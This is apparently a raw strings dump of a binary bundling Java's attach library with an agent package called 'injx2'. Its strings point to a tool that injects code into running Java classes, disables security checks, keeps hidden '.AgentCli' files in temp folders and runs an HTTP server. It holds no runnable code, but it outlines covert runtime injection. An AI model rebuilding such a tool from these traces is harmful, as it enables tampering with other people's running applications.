000000001B12 000000001B12 0 GetVolumeInformationA 000000001B2A 000000001B2A 0 GetProcAddress 000000001B3C 000000001B3C 0 CloseHandle 000000001B4A 000000001B4A 0 OpenProcess 000000001B58 000000001B58 0 GetModuleHandleA 000000001B6C 000000001B6C 0 GetLastError 000000001B7C 000000001B7C 0 ConnectNamedPipe 000000001B90 000000001B90 0 ReadFile 000000001B9C 000000001B9C 0 SetLastError 000000001BAC 000000001BAC 0 GetCurrentThread 000000001BC0 000000001BC0 0 GetCurrentProcess 000000001BD4 000000001BD4 0 CreateNamedPipeA 000000001BE8 000000001BE8 0 GetExitCodeThread 000000001BFC 000000001BFC 0 WaitForSingleObject 000000001C12 000000001C12 0 CreateRemoteThread 000000001C28 000000001C28 0 VirtualFreeEx 000000001C38 000000001C38 0 WriteProcessMemory 000000001C4E 000000001C4E 0 VirtualAllocEx 000000001C60 000000001C60 0 DisableThreadLibraryCalls 000000001C7A 000000001C7A 0 KERNEL32.dll 000000001D40 000000001D40 0 attach.dll 000000001D4B 000000001D4B 0 _Java_sun_tools_attach_WindowsAttachProvider_enumProcesses@16 000000001D89 000000001D89 0 _Java_sun_tools_attach_WindowsAttachProvider_initializeProcessStatusHelper@8 000000001DD6 000000001DD6 0 _Java_sun_tools_attach_WindowsAttachProvider_isLibraryLoadedByProcess@16 000000001E1F 000000001E1F 0 _Java_sun_tools_attach_WindowsAttachProvider_tempPath@8 000000001E57 000000001E57 0 _Java_sun_tools_attach_WindowsAttachProvider_volumeFlags@12 000000001E93 000000001E93 0 _Java_sun_tools_attach_WindowsVirtualMachine_closePipe@16 000000001ECD 000000001ECD 0 _Java_sun_tools_attach_WindowsVirtualMachine_closeProcess@16 000000001F0A 000000001F0A 0 _Java_sun_tools_attach_WindowsVirtualMachine_connectPipe@16 000000001F46 000000001F46 0 _Java_sun_tools_attach_WindowsVirtualMachine_createPipe@12 000000001F81 000000001F81 0 _Java_sun_tools_attach_WindowsVirtualMachine_enqueue@32 000000001FB9 000000001FB9 0 _Java_sun_tools_attach_WindowsVirtualMachine_generateStub@8 000000001FF5 000000001FF5 0 _Java_sun_tools_attach_WindowsVirtualMachine_init@8 000000002029 000000002029 0 _Java_sun_tools_attach_WindowsVirtualMachine_openProcess@12 000000002065 000000002065 0 _Java_sun_tools_attach_WindowsVirtualMachine_readPipe@28 0000000026C5 0000000026C5 0 0<0l0 0000000026DD 0000000026DD 0 1!1*121S1f1 0000000026EF 0000000026EF 0 2(2S2u2 000000002705 000000002705 0 3#3*343<3W3\3 00000000271F 00000000271F 0 4P4e4r4 000000002731 000000002731 0 5#5O5 000000002745 000000002745 0 6#60676B6Q6V6[6 000000002767 000000002767 0 8"8m8 00000000277B 00000000277B 0 9+939=9J9]9|9 0000000027AF 0000000027AF 0 :":-:9:E:R:X:_:h:n:}: File pos Mem pos ID Text ======== ======= == ==== 0000000027CB 0000000027CB 0 ;f;o;t;y; 0000000027DF 0000000027DF 0 ;&<3<@<M< 0000000027F5 0000000027F5 0 4 4,404<4@4 0000000028FA 0000000028FA 0 Z0X03 000000002931 000000002931 0 >0!0 000000002946 000000002946 0 9d@J 0000000029A2 0000000029A2 0 Western Cape1 0000000029B9 0000000029B9 0 Durbanville1 0000000029CF 0000000029CF 0 Thawte1 0000000029E0 0000000029E0 0 Thawte Certification1 0000000029FF 0000000029FF 0 Thawte Timestamping CA0 000000002A19 000000002A19 0 121221000000Z 000000002A28 000000002A28 0 201230235959Z0 000000002A4F 000000002A4F 0 Symantec Corporation100. 000000002A6D 000000002A6D 0 'Symantec Time Stamping Services CA - G20 000000002BA3 000000002BA3 0 ]jxdE 000000002BED 000000002BED 0 &0$0" 000000002BFE 000000002BFE 0 http://ocsp.thawte.com0 000000002C30 000000002C30 0 80604 000000002C3A 000000002C3A 0 .http://crl.thawte.com/ThawteTimestampingCA.crl0 000000002CA8 000000002CA8 0 TimeStamp-2048-10 000000002D93 000000002D93 0 Symantec Corporation100. 000000002DB1 000000002DB1 0 'Symantec Time Stamping Services CA - G20 000000002DDD 000000002DDD 0 121018000000Z 000000002DEC 000000002DEC 0 201229235959Z0b1 000000002E13 000000002E13 0 Symantec Corporation1402 000000002E31 000000002E31 0 +Symantec Time Stamping Services Signer - G40 000000002FCE 000000002FCE 0 g0e0* 000000002FDF 000000002FDF 0 http://ts-ocsp.ws.symantec.com07 00000000300A 00000000300A 0 +http://ts-aia.ws.symantec.com/tss-ca-g2.cer0< 00000000303E 00000000303E 0 50301 000000003048 000000003048 0 +http://ts-crl.ws.symantec.com/tss-ca-g2.crl0( 00000000308E 00000000308E 0 TimeStamp-2048-20 0000000031BF 0000000031BF 0 y3+.{ 0000000031DC 0000000031DC 0 >"hcS 00000000323B 00000000323B 0 VeriSign, Inc.1 000000003254 000000003254 0 VeriSign Trust Network1;09 000000003274 000000003274 0 2Terms of use at https://www.verisign.com/rpa (c)101.0, 0000000032B1 0000000032B1 0 %VeriSign Class 3 Code Signing 2010 CA0 0000000032DB 0000000032DB 0 120706000000Z 0000000032EA 0000000032EA 0 150718235959Z0 000000003312 000000003312 0 California1 000000003326 000000003326 0 Palo Alto1 00000000333B 00000000333B 0 Sun Microsystems, Inc.1>0< 00000000335B 00000000335B 0 5Digital ID Class 3 - Microsoft Software Validation v21 00000000339C 00000000339C 0 Sun Microsystems1 0000000033B7 0000000033B7 0 Sun Microsystems, Inc.0 0000000033FF 0000000033FF 0 Qhkl* 00000000351E 00000000351E 0 90705 000000003528 000000003528 0 /http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D 000000003560 000000003560 0 =0;09 000000003582 000000003582 0 https://www.verisign.com/rpa0 0000000035C0 0000000035C0 0 e0c0$ 0000000035D1 0000000035D1 0 http://ocsp.verisign.com0; 0000000035F6 0000000035F6 0 /http://csc3-2010-aia.verisign.com/CSC3-2010.cer0 0000000037CF 0000000037CF 0 VeriSign, Inc.1 0000000037E8 0000000037E8 0 VeriSign Trust Network1:08 000000003808 000000003808 0 1(c) 2006 VeriSign, Inc. - For authorized use only1E0C 000000003844 000000003844 0 <VeriSign Class 3 Public Primary Certification Authority - G50 000000003885 000000003885 0 100208000000Z File pos Mem pos ID Text ======== ======= == ==== 000000003894 000000003894 0 200207235959Z0 0000000038BC 0000000038BC 0 VeriSign, Inc.1 0000000038D5 0000000038D5 0 VeriSign Trust Network1;09 0000000038F5 0000000038F5 0 2Terms of use at https://www.verisign.com/rpa (c)101.0, 000000003932 000000003932 0 %VeriSign Class 3 Code Signing 2010 CA0 000000003A2E 000000003A2E 0 z;T0S 000000003AA2 000000003AA2 0 i0g0e 000000003AC4 000000003AC4 0 https://www.verisign.com/cps0* 000000003AF0 000000003AF0 0 https://www.verisign.com/rpa0 000000003B2F 000000003B2F 0 [0Y0W0U 000000003B37 000000003B37 0 image/gif0!0 000000003B67 000000003B67 0 #http://logo.verisign.com/vslogo.gif04 000000003B93 000000003B93 0 -0+0) 000000003B9D 000000003B9D 0 #http://crl.verisign.com/pca3-g5.crl04 000000003BCE 000000003BCE 0 (0&0$ 000000003BDF 000000003BDF 0 http://ocsp.verisign.com0 000000003C30 000000003C30 0 VeriSignMPKI-2-80 000000003CB2 000000003CB2 0 G8J-l 000000003DBD 000000003DBD 0 VeriSign, Inc.1 000000003DD6 000000003DD6 0 VeriSign Trust Network1;09 000000003DF6 000000003DF6 0 2Terms of use at https://www.verisign.com/rpa (c)101.0, 000000003E33 000000003E33 0 %VeriSign Class 3 Code Signing 2010 CA 000000003F93 000000003F93 0 cz_V] 000000004070 000000004070 0 Symantec Corporation100. 00000000408E 00000000408E 0 'Symantec Time Stamping Services CA - G2 000000004100 000000004100 0 130326225748Z0# 0000000041EF 0000000041EF 0 P>OTs 0000000041FD 0000000041FD 0 c24 G 00000000420B 00000000420B 0 $1v~WIb 000000004237 000000004237 0 d~eY3 00000000426A 00000000426A 0 META-INF/UT 00000000427D 00000000427D 0 %z\ux 0000000042AD 0000000042AD 0 META-INF/MANIFEST.MFManifest-Version: 1.0 0000000042D8 0000000042D8 0 Ant-Version: Apache Ant 1.9.7 0000000042F7 0000000042F7 0 Created-By: 1.8.0_144-b01 (Oracle Corporation) 000000004327 000000004327 0 Class-Path: lib/tools.jar lib/lib/ 00000000434B 00000000434B 0 X-COMMENT: Main-Class will be added automatically by build 000000004387 000000004387 0 Main-Class: injx2.INJX 00000000439F 00000000439F 0 Agent-Class: injx2.Agent 0000000043B9 0000000043B9 0 Can-Retransform-Classes: true 0000000043D8 0000000043D8 0 Can-Redefine-Classes: true 000000004414 000000004414 0 conf/PK 000000004437 000000004437 0 dynamic/PK 00000000445D 00000000445D 0 injx2/UT 00000000446D 00000000446D 0 #z\ux 00000000449D 00000000449D 0 injx2/Agent$KRunnable.class 0000000045F3 0000000045F3 0 <init> 000000004609 000000004609 0 LineNumberTable 00000000461B 00000000461B 0 LocalVariableTable 000000004636 000000004636 0 KRunnable 000000004643 000000004643 0 InnerClasses 000000004652 000000004652 0 Linjx2/Agent$KRunnable; 000000004677 000000004677 0 Ljava/lang/Exception; 00000000468F 00000000468F 0 input 000000004697 000000004697 0 Ljava/io/FileInputStream; 0000000046B2 0000000046B2 0 origbytes 0000000046C4 0000000046C4 0 definition 0000000046D0 0000000046D0 0 &Ljava/lang/instrument/ClassDefinition; 000000004700 000000004700 0 targetClassInternalForm 00000000471A 00000000471A 0 Ljava/lang/String; File pos Mem pos ID Text ======== ======= == ==== 000000004738 000000004738 0 inscount 000000004743 000000004743 0 action 000000004754 000000004754 0 Ljava/io/File; 00000000476A 00000000476A 0 spaths 000000004773 000000004773 0 [Ljava/lang/String; 000000004789 000000004789 0 StackMapTable 0000000047AB 0000000047AB 0 SourceFile 0000000047B8 0000000047B8 0 Agent.java 0000000047D2 0000000047D2 0 java/lang/Exception 0000000047E8 0000000047E8 0 java/lang/String 0000000047FB 0000000047FB 0 /dev/shm/.AgentCli 000000004810 000000004810 0 /tmp/.AgentCli 000000004821 000000004821 0 c:\windows\temp\.AgentCli 00000000483D 00000000483D 0 c:\temp\.AgentCli 000000004851 000000004851 0 java/lang/StringBuilder 00000000486B 00000000486B 0 APPDATA 000000004882 000000004882 0 \.AgentCli 000000004894 000000004894 0 java/io/File 0000000048B2 0000000048B2 0 java/io/FileInputStream 0000000048E3 0000000048E3 0 Restoring: 000000004935 000000004935 0 $java/lang/instrument/ClassDefinition 000000004979 000000004979 0 java/io/PrintWriter 0000000049F6 0000000049F6 0 injx2/Agent$KRunnable 000000004A0E 000000004A0E 0 java/lang/Object 000000004A21 000000004A21 0 java/lang/Runnable 000000004A36 000000004A36 0 java/lang/Thread 000000004A49 000000004A49 0 sleep 000000004A58 000000004A58 0 java/lang/System 000000004A6B 000000004A6B 0 getenv 000000004A73 000000004A73 0 &(Ljava/lang/String;)Ljava/lang/String; 000000004A9D 000000004A9D 0 append 000000004AA5 000000004AA5 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000004AD6 000000004AD6 0 toString 000000004AE1 000000004AE1 0 ()Ljava/lang/String; 000000004AF8 000000004AF8 0 (Ljava/lang/String;)V 000000004B10 000000004B10 0 exists 000000004B1F 000000004B1F 0 isDirectory 000000004B2D 000000004B2D 0 (Ljava/io/File;)V 000000004B4E 000000004B4E 0 delete 000000004B57 000000004B57 0 injx2/Global 000000004B6D 000000004B6D 0 Ljava/io/BufferedWriter; 000000004B88 000000004B88 0 java/io/BufferedWriter 000000004BA1 000000004BA1 0 write 000000004BA9 000000004BA9 0 flush 000000004BB1 000000004BB1 0 injx2/Agent 000000004BBF 000000004BBF 0 instrumentedClassName 000000004BD7 000000004BD7 0 toeditcount 000000004BE5 000000004BE5 0 toedit 000000004BEE 000000004BEE 0 [Ljava/lang/Class; 000000004C03 000000004C03 0 java/lang/Class 000000004C15 000000004C15 0 getName 000000004C1F 000000004C1F 0 equals 000000004C28 000000004C28 0 (Ljava/lang/Object;)Z 000000004C40 000000004C40 0 Ljava/util/Hashtable; 000000004C58 000000004C58 0 java/util/Hashtable 000000004C73 000000004C73 0 &(Ljava/lang/Object;)Ljava/lang/Object; 000000004C9D 000000004C9D 0 clone 000000004CA5 000000004CA5 0 ()Ljava/lang/Object; 000000004CBC 000000004CBC 0 (Ljava/lang/Class;[B)V 000000004CD5 000000004CD5 0 access$000 File pos Mem pos ID Text ======== ======= == ==== 000000004CE1 000000004CE1 0 (()Ljava/lang/instrument/Instrumentation; 000000004D0C 000000004D0C 0 $java/lang/instrument/Instrumentation 000000004D34 000000004D34 0 redefineClasses 000000004D45 000000004D45 0 *([Ljava/lang/instrument/ClassDefinition;)V 000000004D73 000000004D73 0 getMessage 000000004D80 000000004D80 0 (Ljava/io/Writer;)V 000000004D96 000000004D96 0 printStackTrace 000000004DA8 000000004DA8 0 (Ljava/io/PrintWriter;)V 000000004DC3 000000004DC3 0 chashes 000000004DCD 000000004DCD 0 hashes2 000000004DD7 000000004DD7 0 chashes2 000000004DE2 000000004DE2 0 instrumentedMethodName 000000004DFB 000000004DFB 0 instrumentedConstructorName 000000004E19 000000004E19 0 instrumentedArgsMap 000000004E2F 000000004E2F 0 acodeinsert 000000004E3D 000000004E3D 0 bcodeinsert 000000004E4B 000000004E4B 0 close 000000004E53 000000004E53 0 verpatch 000000004E5E 000000004E5E 0 scandyna 000000004E69 000000004E69 0 access$100 000000004E76 000000004E76 0 access$200 000000004E82 000000004E82 0 haverunya 000000004E8F 000000004E8F 0 runya 000000004E97 000000004E97 0 hashes3 000000004EA1 000000004EA1 0 chashes3 0000000053DB 0000000053DB 0 injx2/Agent.class 00000000582C 00000000582C 0 KRunnable 000000005839 000000005839 0 InnerClasses 00000000584F 00000000584F 0 Ljava/util/Properties; 000000005868 000000005868 0 instrumentedClassName 000000005880 000000005880 0 [Ljava/lang/String; 000000005896 000000005896 0 instrumentedMethodName 0000000058AF 0000000058AF 0 instrumentedConstructorName 0000000058CD 0000000058CD 0 instrumentedArgsMap 0000000058E3 0000000058E3 0 acodeinsert 0000000058F1 0000000058F1 0 bcodeinsert 0000000058FF 0000000058FF 0 instrumentit 00000000590E 00000000590E 0 toedit 000000005917 000000005917 0 [Ljava/lang/Class; 00000000592C 00000000592C 0 toeditcount 00000000593E 00000000593E 0 allLoadedClasses 000000005951 000000005951 0 cPool 000000005959 000000005959 0 Linjx2/javassist/ClassPool; 000000005977 000000005977 0 conffile 000000005982 000000005982 0 Ljava/lang/String; 000000005997 000000005997 0 global 0000000059A0 0000000059A0 0 hashes 0000000059A9 0000000059A9 0 chashes 0000000059B3 0000000059B3 0 hashes2 0000000059BD 0000000059BD 0 chashes2 0000000059C8 0000000059C8 0 hashes3 0000000059D2 0000000059D2 0 chashes3 0000000059DD 0000000059DD 0 disablesec 0000000059EA 0000000059EA 0 verpatch 0000000059F5 0000000059F5 0 detach 0000000059FD 0000000059FD 0 haverunya 000000005A0A 000000005A0A 0 otroval 000000005A14 000000005A14 0 instrumentation 000000005A25 000000005A25 0 &Ljava/lang/instrument/Instrumentation; 000000005A4F 000000005A4F 0 paths File pos Mem pos ID Text ======== ======= == ==== 000000005A57 000000005A57 0 cpaths 000000005A60 000000005A60 0 <init> 000000005A76 000000005A76 0 LineNumberTable 000000005A88 000000005A88 0 LocalVariableTable 000000005AA4 000000005AA4 0 Linjx2/Agent; 000000005AB4 000000005AB4 0 runya 000000005ABC 000000005ABC 0 concatenate 000000005AC9 000000005AC9 0 ;([Ljava/lang/Object;[Ljava/lang/Object;)[Ljava/lang/Object; 000000005B0C 000000005B0C 0 [Ljava/lang/Object; 000000005B38 000000005B38 0 LocalVariableTypeTable 000000005B51 000000005B51 0 [TClass; 000000005B5B 000000005B5B 0 Signature 000000005B67 000000005B67 0 4<Class:Ljava/lang/Object;>([TClass;[TClass;)[TClass; 000000005B9F 000000005B9F 0 allclass 000000005BB6 000000005BB6 0 Ljava/lang/Exception; 000000005BD3 000000005BD3 0 StackMapTable 000000005BE6 000000005BE6 0 checkinstance 000000005BF5 000000005BF5 0 ,(Ljava/lang/ClassLoader;Ljava/lang/String;)V 000000005C25 000000005C25 0 VALUES3 000000005C2F 000000005C2F 0 Ljava/util/Set; 000000005C41 000000005C41 0 cloader 000000005C4B 000000005C4B 0 Ljava/lang/ClassLoader; 000000005C65 000000005C65 0 lookfor 000000005C6F 000000005C6F 0 insta 000000005C76 000000005C76 0 #Ljava/util/Set<Ljava/lang/String;>; 000000005C9D 000000005C9D 0 patchall 000000005CA8 000000005CA8 0 loaded 000000005CB1 000000005CB1 0 inscount 000000005CBB 000000005CBB 0 container 000000005CC8 000000005CC8 0 mclassloader 000000005CE2 000000005CE2 0 Ljava/io/IOException; 000000005CFA 000000005CFA 0 argsplit 000000005D11 000000005D11 0 [Linjx2/javassist/CtClass; 000000005D2D 000000005D2D 0 signature 000000005D4F 000000005D4F 0 definition 000000005D5B 000000005D5B 0 &Ljava/lang/instrument/ClassDefinition; 000000005D85 000000005D85 0 ctClass 000000005D8F 000000005D8F 0 Linjx2/javassist/CtClass; 000000005DB2 000000005DB2 0 [Linjx2/javassist/CtMethod; 000000005DD0 000000005DD0 0 ctClassMethod 000000005DE0 000000005DE0 0 Linjx2/javassist/CtMethod; 000000005DFD 000000005DFD 0 ctConstructors 000000005E0D 000000005E0D 0 [Linjx2/javassist/CtConstructor; 000000005E3C 000000005E3C 0 someinject 000000005E67 000000005E67 0 loadconf 000000005E77 000000005E77 0 input 000000005E7F 000000005E7F 0 Ljava/io/FileInputStream; 000000005E9B 000000005E9B 0 porthttp 000000005EA6 000000005EA6 0 counter 000000005EB3 000000005EB3 0 setStaticValue 000000005EC3 000000005EC3 0 9(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Object;)V 000000005EFF 000000005EFF 0 className 000000005F0B 000000005F0B 0 fieldName 000000005F18 000000005F18 0 newValue 000000005F23 000000005F23 0 Ljava/lang/Object; 000000005F38 000000005F38 0 field 000000005F40 000000005F40 0 Ljava/lang/reflect/Field; 000000005F5C 000000005F5C 0 oldValue 000000005F67 000000005F67 0 Exceptions 000000005F83 000000005F83 0 appendalldir File pos Mem pos ID Text ======== ======= == ==== 000000005F91 000000005F91 0 ,(Ljava/io/File;Linjx2/javassist/ClassPool;)V 000000005FC0 000000005FC0 0 fileEntry 000000005FCD 000000005FCD 0 Ljava/io/File; 000000005FE5 000000005FE5 0 [Ljava/io/File; 000000006003 000000006003 0 folder 000000006015 000000006015 0 getClassResource 000000006027 000000006027 0 %(Ljava/lang/Class;)Ljava/lang/String; 000000006050 000000006050 0 klass 000000006058 000000006058 0 Ljava/lang/Class; 00000000606C 00000000606C 0 Ljava/lang/Class<*>; 000000006085 000000006085 0 ((Ljava/lang/Class<*>;)Ljava/lang/String; 0000000060B1 0000000060B1 0 IgetClassResource 0000000060C4 0000000060C4 0 =(Ljava/lang/ClassLoader;Ljava/lang/String;)Ljava/lang/String; 00000000610B 00000000610B 0 Ljava/net/URL; 000000006123 000000006123 0 VALUES 000000006132 000000006132 0 insertpaths 00000000613F 00000000613F 0 0(Ljava/lang/String;Linjx2/javassist/ClassPool;)V 000000006173 000000006173 0 pfolder 00000000617D 00000000617D 0 startagent 000000006189 000000006189 0 ;(Ljava/lang/String;Ljava/lang/instrument/Instrumentation;)V 0000000061C7 0000000061C7 0 agentArgs 0000000061DB 0000000061DB 0 errwrite 0000000061E6 0000000061E6 0 Ljava/io/PrintStream; 0000000061FD 0000000061FD 0 agentmain 00000000620A 00000000620A 0 bootstrapLoader 00000000621C 00000000621C 0 Ljava/net/URISyntaxException; 00000000623C 00000000623C 0 agentclasses 00000000624B 00000000624B 0 Ljava/util/jar/JarFile; 00000000626E 00000000626E 0 access$000 00000000627A 00000000627A 0 (()Ljava/lang/instrument/Instrumentation; 0000000062A6 0000000062A6 0 access$100 0000000062B3 0000000062B3 0 access$200 0000000062C0 0000000062C0 0 <clinit> 0000000062CB 0000000062CB 0 SourceFile 0000000062D8 0000000062D8 0 Agent.java 000000006360 000000006360 0 java/lang/Exception 000000006376 000000006376 0 java/util/HashSet 0000000063E1 0000000063E1 0 java/lang/StringBuilder 0000000063FB 0000000063FB 0 Class loaded: 000000006424 000000006424 0 injx2. 000000006437 000000006437 0 javassist. 000000006449 000000006449 0 .class 00000000646A 00000000646A 0 .jar! 000000006479 000000006479 0 .jar/ 000000006488 000000006488 0 file: 0000000064A1 0000000064A1 0 (unknown) 0000000064AF 0000000064AF 0 ERRORCR: 0000000064CB 0000000064CB 0 INJ: 0000000064DA 0000000064DA 0 java/io/IOException 0000000064F0 0000000064F0 0 injx2/Agent 000000006518 000000006518 0 java/util/Hashtable 00000000654A 00000000654A 0 java/io/ByteArrayInputStream 000000006597 000000006597 0 UNDECLARED 0000000065BB 0000000065BB 0 Method: 0000000065D9 0000000065D9 0 Argument: 0000000065F0 0000000065F0 0 Signature: 00000000660B 00000000660B 0 Match! 000000006644 000000006644 0 $java/lang/instrument/ClassDefinition 000000006679 000000006679 0 Injected: 000000006686 000000006686 0 No code to inject! File pos Mem pos ID Text ======== ======= == ==== 00000000669B 00000000669B 0 "Error: Native or Abstract method! 0000000066C1 0000000066C1 0 Error: 0000000066CB 0000000066CB 0 java/io/PrintWriter 0000000066EB 0000000066EB 0 java/lang/Class 0000000066FD 0000000066FD 0 java/lang/String 000000006710 000000006710 0 java/io/FileInputStream 000000006745 000000006745 0 65413 00000000675E 00000000675E 0 runonload 000000006770 000000006770 0 disablesecurity 000000006790 000000006790 0 verbose 00000000679D 00000000679D 0 logoutput 0000000067AF 0000000067AF 0 stdout 0000000067B8 0000000067B8 0 java/io/BufferedWriter 0000000067D1 0000000067D1 0 java/io/OutputStreamWriter 0000000067F8 0000000067F8 0 java/io/FileWriter 000000006812 000000006812 0 Started... 000000006820 000000006820 0 class 000000006828 000000006828 0 method 000000006836 000000006836 0 constructor 000000006844 000000006844 0 instrument 000000006851 000000006851 0 endcode 00000000685A 00000000685A 0 startcode 000000006867 000000006867 0 Class: 000000006870 000000006870 0 Method: 00000000687D 00000000687D 0 injx2.Agent 0000000068B1 0000000068B1 0 Append classpath: 0000000068E1 0000000068E1 0 Location: 0000000068F3 0000000068F3 0 java/io/File 000000006916 000000006916 0 java/io/PrintStream 00000000692C 00000000692C 0 java/io/FileOutputStream 000000006947 000000006947 0 C:\windows\temp\logerrdet2.txt 000000006972 000000006972 0 java.lang.System 000000006985 000000006985 0 security 000000006995 000000006995 0 X_X... 00000000699F 00000000699F 0 java/lang/Thread 0000000069B2 0000000069B2 0 injx2/Agent$KRunnable 0000000069E3 0000000069E3 0 java/util/jar/JarFile 000000006A30 000000006A30 0 $java/lang/instrument/Instrumentation 000000006A5D 000000006A5D 0 java/lang/Object 000000006A78 000000006A78 0 java/net/URISyntaxException 000000006A96 000000006A96 0 java/util/Properties 000000006AC6 000000006AC6 0 java/lang/ClassLoader 000000006ADE 000000006ADE 0 injx2/javassist/CtClass 000000006AF8 000000006AF8 0 injx2/javassist/CtMethod 000000006B13 000000006B13 0 java/lang/SecurityException 000000006B31 000000006B31 0 java/lang/NoSuchFieldException 000000006B51 000000006B51 0 java/lang/ClassNotFoundException 000000006B74 000000006B74 0 "java/lang/IllegalArgumentException 000000006B99 000000006B99 0 java/lang/IllegalAccessException 000000006BBD 000000006BBD 0 injx2/javassist/ClassPool 000000006BD9 000000006BD9 0 java/util/Set 000000006BE9 000000006BE9 0 java/net/URL 000000006BF8 000000006BF8 0 getClass 000000006C03 000000006C03 0 ()Ljava/lang/Class; 000000006C19 000000006C19 0 getComponentType 000000006C2C 000000006C2C 0 java/lang/reflect/Array 000000006C46 000000006C46 0 newInstance 000000006C53 000000006C53 0 &(Ljava/lang/Class;I)Ljava/lang/Object; 000000006C7D 000000006C7D 0 java/lang/System 000000006C8F 000000006C8F 0 arraycopy File pos Mem pos ID Text ======== ======= == ==== 000000006C9B 000000006C9B 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 000000006CC9 000000006CC9 0 getAllLoadedClasses 000000006CDF 000000006CDF 0 ()[Ljava/lang/Class; 000000006CF6 000000006CF6 0 getSystemClassLoader 000000006D0D 000000006D0D 0 ()Ljava/lang/ClassLoader; 000000006D29 000000006D29 0 getInitiatedClasses 000000006D3E 000000006D3E 0 +(Ljava/lang/ClassLoader;)[Ljava/lang/Class; 000000006D6C 000000006D6C 0 getParent 000000006D79 000000006D79 0 injx2/Global 000000006D88 000000006D88 0 runningclass 000000006D97 000000006D97 0 Ljava/util/Map; 000000006DA9 000000006DA9 0 getName 000000006DB3 000000006DB3 0 ()Ljava/lang/String; 000000006DCA 000000006DCA 0 java/util/Map 000000006DDF 000000006DDF 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 000000006E1B 000000006E1B 0 equals 000000006E24 000000006E24 0 (Ljava/lang/Object;)Z 000000006E3C 000000006E3C 0 java/util/Arrays 000000006E4F 000000006E4F 0 asList 000000006E57 000000006E57 0 %([Ljava/lang/Object;)Ljava/util/List; 000000006E80 000000006E80 0 (Ljava/util/Collection;)V 000000006E9C 000000006E9C 0 hashCode 000000006EAD 000000006EAD 0 java/lang/Integer 000000006EC1 000000006EC1 0 toString 000000006ECC 000000006ECC 0 (I)Ljava/lang/String; 000000006EE4 000000006EE4 0 contains 000000006EEF 000000006EEF 0 checklog 000000006EFA 000000006EFA 0 getDefault 000000006F07 000000006F07 0 ()Linjx2/javassist/ClassPool; 000000006F2E 000000006F2E 0 Ljava/io/BufferedWriter; 000000006F49 000000006F49 0 append 000000006F51 000000006F51 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000006F82 000000006F82 0 write 000000006F8A 000000006F8A 0 (Ljava/lang/String;)V 000000006FA2 000000006FA2 0 flush 000000006FAA 000000006FAA 0 startsWith 000000006FB7 000000006FB7 0 (Ljava/lang/String;)Z 000000006FCF 000000006FCF 0 getClassLoader 000000006FE0 000000006FE0 0 replace 000000006FEA 000000006FEA 0 (CC)Ljava/lang/String; 000000007003 000000007003 0 getResource 000000007010 000000007010 0 "(Ljava/lang/String;)Ljava/net/URL; 000000007035 000000007035 0 D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String; 00000000707D 00000000707D 0 printStackTrace 00000000708F 00000000708F 0 getLocalizedMessage 0000000070A5 0000000070A5 0 getMessage 0000000070B2 0000000070B2 0 java/util/logging/Logger 0000000070CC 0000000070CC 0 getLogger 0000000070D8 0000000070D8 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 00000000710A 00000000710A 0 java/util/logging/Level 000000007124 000000007124 0 SEVERE 00000000712D 00000000712D 0 Ljava/util/logging/Level; 00000000714E 00000000714E 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 000000007194 000000007194 0 origbytes 0000000071A1 0000000071A1 0 Ljava/util/Hashtable; 0000000071BE 0000000071BE 0 &(Ljava/lang/Object;)Ljava/lang/Object; 0000000071E7 0000000071E7 0 -(Ljava/lang/String;)Linjx2/javassist/CtClass; 000000007218 000000007218 0 stopPruning 00000000722D 00000000722D 0 isFrozen 00000000723E 00000000723E 0 defrost File pos Mem pos ID Text ======== ======= == ==== 000000007248 000000007248 0 clone 000000007250 000000007250 0 ()Ljava/lang/Object; 000000007267 000000007267 0 ([B)V 00000000726E 00000000726E 0 makeClass 00000000727A 00000000727A 0 0(Ljava/io/InputStream;)Linjx2/javassist/CtClass; 0000000072AE 0000000072AE 0 rebuildClassFile 0000000072C1 0000000072C1 0 toBytecode 0000000072D5 0000000072D5 0 getDeclaredMethods 0000000072EA 0000000072EA 0 ()[Linjx2/javassist/CtMethod; 00000000730A 00000000730A 0 getDeclaredConstructors 000000007323 000000007323 0 "()[Linjx2/javassist/CtConstructor; 000000007349 000000007349 0 getDeclaredMethod 00000000735C 00000000735C 0 .(Ljava/lang/String;)Linjx2/javassist/CtMethod; 00000000738E 00000000738E 0 getParameterTypes 0000000073A2 0000000073A2 0 ()[Linjx2/javassist/CtClass; 0000000073C1 0000000073C1 0 split 0000000073C8 0000000073C8 0 '(Ljava/lang/String;)[Ljava/lang/String; 0000000073F3 0000000073F3 0 replaceAll 0000000073FF 0000000073FF 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000743B 00000000743B 0 toUpperCase 000000007449 000000007449 0 getModifiers 000000007458 000000007458 0 injx2/javassist/Modifier 000000007473 000000007473 0 isNative 000000007485 000000007485 0 isAbstract 000000007492 000000007492 0 insertBefore 0000000074A1 0000000074A1 0 insertAfter 0000000074AF 0000000074AF 0 (Ljava/lang/Class;[B)V 0000000074C8 0000000074C8 0 redefineClasses 0000000074D9 0000000074D9 0 *([Ljava/lang/instrument/ClassDefinition;)V 000000007507 000000007507 0 (Ljava/io/Writer;)V 00000000751D 00000000751D 0 (Ljava/io/PrintWriter;)V 00000000753F 00000000753F 0 (Ljava/io/InputStream;)V 00000000755A 00000000755A 0 getProperty 000000007568 000000007568 0 parseInt 000000007573 000000007573 0 (Ljava/lang/String;)I 00000000758B 00000000758B 0 injx2/HTTPServ 0000000075A7 0000000075A7 0 &(Ljava/lang/String;)Ljava/lang/String; 0000000075D7 0000000075D7 0 (Ljava/io/OutputStream;)V 0000000075F3 0000000075F3 0 close 0000000075FB 0000000075FB 0 forName 000000007604 000000007604 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000762D 00000000762D 0 getDeclaredField 00000000763F 00000000763F 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 000000007670 000000007670 0 java/lang/reflect/Field 00000000768A 00000000768A 0 setAccessible 0000000076A6 0000000076A6 0 '(Ljava/lang/Object;Ljava/lang/Object;)V 0000000076D1 0000000076D1 0 isDirectory 0000000076DE 0000000076DE 0 listFiles 0000000076EB 0000000076EB 0 ()[Ljava/io/File; 